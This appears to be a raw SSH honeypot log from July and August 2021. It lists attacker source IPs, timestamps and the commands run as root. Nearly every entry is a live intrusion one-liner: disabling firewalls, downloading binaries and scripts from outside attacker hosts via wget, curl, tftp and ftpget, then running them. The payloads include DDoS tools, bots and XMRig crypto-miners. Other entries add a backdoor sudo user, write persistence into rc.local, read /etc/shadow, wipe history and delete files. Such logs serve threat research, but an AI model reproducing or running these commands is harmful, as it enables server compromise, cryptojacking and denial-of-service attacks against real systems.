Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/dos32;chmod 777 dos32;./dos32;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/dos32
chmod 777 dos32
./dos32

From 185.132.251.20 31-Jul-2021 22:07:53 ssh2 root
ls

From 193.105.134.45 31-Jul-2021 23:08:25 ssh2 root
cd ..
ls
wget http
ls
vi ipcalc.pl

From 8.37.43.9 31-Jul-2021 23:19:44 ssh2 root
help
--help
cd root
--help
h
show
wget https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz
wget https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz
wget -O https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz
wget -U https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz

From 179.43.141.99 1-Aug-2021 00:47:14 ssh2 root
Exec cd /tmp; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s;
cd /tmp
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
pkill Xorg
pkill x86_64

From 77.244.216.110 1-Aug-2021 01:01:04 ssh2 root
Exec cat /etc/issue
cat /etc/issue
Exec cat /etc/issue
cat /etc/issue
Exec cat /etc/issue
cat /etc/issue

From 109.104.151.109 1-Aug-2021 10:00:44 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.112/multi/bins/bot.i586; curl -O http://109.104.151.112/multi/bins/bot.i586; chmod 777 bot.i586; chmod +x bot.i586; ./bot.i586 Exploit.x86; rm -rf bot.i586; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.112/multi/bins/bot.i586
curl -O http://109.104.151.112/multi/bins/bot.i586
chmod 777 bot.i586
chmod +x bot.i586
./bot.i586 Exploit.x86
rm -rf bot.i586
history -c

From 180.215.194.46 1-Aug-2021 21:34:00 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/32u;chmod 777 32u;./32u;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/32u
chmod 777 32u
./32u
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/32u;chmod 777 32u;./32u;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/32u
chmod 777 32u
./32u

From 180.215.194.46 1-Aug-2021 21:42:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/32u;chmod 777 32u;./32u;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/32u
chmod 777 32u
./32u

From 117.24.13.169 2-Aug-2021 05:16:28 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.107.11.18/TT;chmod 777 TT;./TT;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://103.107.11.18/TT
chmod 777 TT
./TT

From 209.141.61.41 3-Aug-2021 08:25:03 ssh2 root
Exec cat /etc/issue; wget -O- http://45.133.9.175/r.sh | sh; curl http://45.133.9.175/q.sh | sh; useradd -p  fwontop; usermod -aG wheel fwontop; usermod -aG sudo fwontop; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
wget -O- http://45.133.9.175/r.sh | sh
curl http://45.133.9.175/q.sh | sh
useradd -p fwontop
usermod -aG wheel fwontop
usermod -aG sudo fwontop
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 203.146.249.3 3-Aug-2021 13:03:51 ssh2 root
Exec uname -a;nproc
uname -a
nproc
Exec uname -a;nproc
uname -a
nproc
Exec uname -a;nproc
uname -a
nproc

From 203.146.249.3 3-Aug-2021 13:49:27 ssh2 root
Exec uname -a;nproc
uname -a
nproc
Exec uname -a;nproc
uname -a
nproc

From 107.189.2.152 3-Aug-2021 14:45:56 ssh2 root
Exec uname -a
uname -a
Exec uname -a
uname -a

From 117.24.13.169 6-Aug-2021 18:51:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c wget http://api.4lheqi.cn/SYNUDP;chmod 777 SYNUDP;./SYNUDP;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c wget http://api.4lheqi.cn/SYNUDP
chmod 777 SYNUDP
./SYNUDP
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c wget http://api.4lheqi.cn/SYNUDP;chmod 777 SYNUDP;./SYNUDP;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c wget http://api.4lheqi.cn/SYNUDP
chmod 777 SYNUDP
./SYNUDP

From 222.186.133.167 9-Aug-2021 01:24:30 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/lwbb;chmod 777 lwbb;./lwbb;echo "cd /tmp/">>/etc/rc.local;echo "./lwbb&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/lwbb
chmod 777 lwbb
./lwbb
echo "cd /tmp/">>/etc/rc.local
echo "./lwbb
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/lwbb;chmod 777 lwbb;./lwbb;echo "cd /tmp/">>/etc/rc.local;echo "./lwbb&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/lwbb
chmod 777 lwbb
./lwbb
echo "cd /tmp/">>/etc/rc.local
echo "./lwbb
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 209.141.36.53 9-Aug-2021 05:12:51 ssh2 root
Exec cat /etc/issue; cd /tmp; wget http://45.133.9.32/x86_64; chmod 777 *; ./x86_64 x86xhed; rm -rf *
cat /etc/issue
cd /tmp
wget http://45.133.9.32/x86_64
chmod 777 *
./x86_64 x86xhed
rm -rf *

From 209.145.54.176 9-Aug-2021 14:00:38 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget 180.76.250.36/.b/mig
chmod +x mig
mv mig /bin/mig
mig -u root -n 1
unma,e -a
uname -a

From 209.145.54.176 9-Aug-2021 19:35:13 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget 180.76.250.36/.b/mig
chmod +x mig
mv mig /bin/mig
mig -u root -n 1
w
uname -a
cat /proc/cpuinfo

From 180.215.194.46 9-Aug-2021 22:24:12 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/s1;chmod 777 s1;./s1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/s1
chmod 777 s1
./s1
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/s1;chmod 777 s1;./s1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/s1
chmod 777 s1
./s1

From 209.141.48.211 10-Aug-2021 02:51:56 ssh2 root
Exec cat /etc/issue; cd /tmp; wget http://45.133.9.32/x86_64; chmod 777 *; ./x86_64 x86xhed; rm -rf *
cat /etc/issue
cd /tmp
wget http://45.133.9.32/x86_64
chmod 777 *
./x86_64 x86xhed
rm -rf *

From 209.141.53.60 10-Aug-2021 17:13:33 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 10-Aug-2021 18:50:03 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 10-Aug-2021 23:38:55 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 10-Aug-2021 23:49:49 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 11-Aug-2021 00:48:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 120.194.74.123 11-Aug-2021 04:05:26 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
w

From 120.194.74.123 11-Aug-2021 04:05:30 ssh2 root
lscpu
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 120.194.74.123 11-Aug-2021 04:05:37 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
ip a

From 120.194.74.123 11-Aug-2021 04:05:40 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
wgroute -n

From 120.194.74.123 11-Aug-2021 04:05:45 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
route -n

From 120.194.74.123 11-Aug-2021 04:05:49 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
id richard

From 120.194.74.123 11-Aug-2021 04:05:52 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
ls -a

From 120.194.74.123 11-Aug-2021 04:05:54 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
cd /home

From 120.194.74.123 11-Aug-2021 04:05:57 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
ls -a
ls -a
id

From 120.194.74.123 11-Aug-2021 04:06:04 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
cat /etc/shadow

From 120.194.74.123 11-Aug-2021 04:06:13 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
cat test.pl

From 120.194.74.123 11-Aug-2021 04:06:25 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
reboot

From 120.194.74.123 11-Aug-2021 04:06:27 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
/sbin/reboot

From 109.104.151.112 11-Aug-2021 07:06:35 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.112/multi32/bins/newsetup; curl -O http://109.104.151.112/multi32/bins/newsetup; chmod 777 newsetup; chmod +x newsetup; ./newsetup Exploit.x86; rm -rf newsetup; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.112/multi32/bins/newsetup
curl -O http://109.104.151.112/multi32/bins/newsetup
chmod 777 newsetup
chmod +x newsetup
./newsetup Exploit.x86
rm -rf newsetup
history -c

From 179.43.141.99 12-Aug-2021 01:37:40 ssh2 root
Exec pkill Opera; pkill Xorg; pkill x86_64; cd /tmp; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s;
pkill Opera
pkill Xorg
pkill x86_64
cd /tmp
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
pkill Xorg
pkill x86_64

From 222.186.133.167 12-Aug-2021 07:02:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsqq;chmod 777 wsqq;./wsqq;echo "cd /tmp/">>/etc/rc.local;echo "./wsqq&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsqq
chmod 777 wsqq
./wsqq
echo "cd /tmp/">>/etc/rc.local
echo "./wsqq
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsqq;chmod 777 wsqq;./wsqq;echo "cd /tmp/">>/etc/rc.local;echo "./wsqq&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsqq
chmod 777 wsqq
./wsqq
echo "cd /tmp/">>/etc/rc.local
echo "./wsqq
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 180.215.194.46 12-Aug-2021 13:47:50 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/Linux-udp26000;chmod 777 Linux-udp26000;./Linux-udp26000;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/Linux-udp26000
chmod 777 Linux-udp26000
./Linux-udp26000
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://154.220.3.36:8080/Linux-udp26000;chmod 777 Linux-udp26000;./Linux-udp26000;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://154.220.3.36:8080/Linux-udp26000
chmod 777 Linux-udp26000
./Linux-udp26000

From 109.104.151.106 12-Aug-2021 20:18:38 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://betaalverzoek.ir/binInfect.sh; curl -O http://betaalverzoek.ir/binInfect.sh; chmod 777 binInfect.sh; sh binInfect.sh; tftp betaalverzoek.ir -c get binInfect.sh; chmod 777 binInfect.sh; sh binInfect.sh; tftp -r binInfect2.sh -g betaalverzoek.ir; chmod 777 binInfect2.sh; sh binInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 betaalverzoek.ir binInfect1.sh binInfect1.sh; sh binInfect1.sh; rm -rf binInfect.sh binInfect.sh binInfect2.sh binInfect1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://betaalverzoek.ir/binInfect.sh
curl -O http://betaalverzoek.ir/binInfect.sh
chmod 777 binInfect.sh
sh binInfect.sh
tftp betaalverzoek.ir -c get binInfect.sh
chmod 777 binInfect.sh
sh binInfect.sh
tftp -r binInfect2.sh -g betaalverzoek.ir
chmod 777 binInfect2.sh
sh binInfect2.sh
ftpget -v -u anonymous -p anonymous -P 21 betaalverzoek.ir binInfect1.sh binInfect1.sh
sh binInfect1.sh
rm -rf binInfect.sh binInfect.sh binInfect2.sh binInfect1.sh
rm -rf *

From 209.141.36.53 13-Aug-2021 02:11:53 ssh2 root
Exec cat /etc/issue; cd /tmp; wget http://45.133.9.32/x86; chmod 777 *; ./x86 x86xhed; rm -rf *
cat /etc/issue
cd /tmp
wget http://45.133.9.32/x86
chmod 777 *
./x86 x86xhed
rm -rf *

From 209.141.36.53 13-Aug-2021 08:08:52 ssh2 root
Exec cat /etc/issue; cd /tmp; wget http://45.133.9.32/x86; chmod 777 *; ./x86 x86xhed; rm -rf *
cat /etc/issue
cd /tmp
wget http://45.133.9.32/x86
chmod 777 *
./x86 x86xhed
rm -rf *

From 122.96.31.99 13-Aug-2021 18:04:53 ssh2 root
Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget  http://navtech.thevsuman.com/ug.txt;perl ug.txt*;wget http://navtech.thevsuman.com/serv.tar.gz;tar xf serv.tar.gz;cd serv;mv xmrig server;./server
nproc
uname -a
cd /tmp
rm -rf serv*
wget http://navtech.thevsuman.com/ug.txt
perl ug.txt*
wget http://navtech.thevsuman.com/serv.tar.gz
tar xf serv.tar.gz
cd serv
mv xmrig server
./server

From 222.186.133.167 14-Aug-2021 05:45:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/hhgg;chmod 777 hhgg;./hhgg;echo "cd /tmp/">>/etc/rc.local;echo "./hhgg&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/hhgg
chmod 777 hhgg
./hhgg
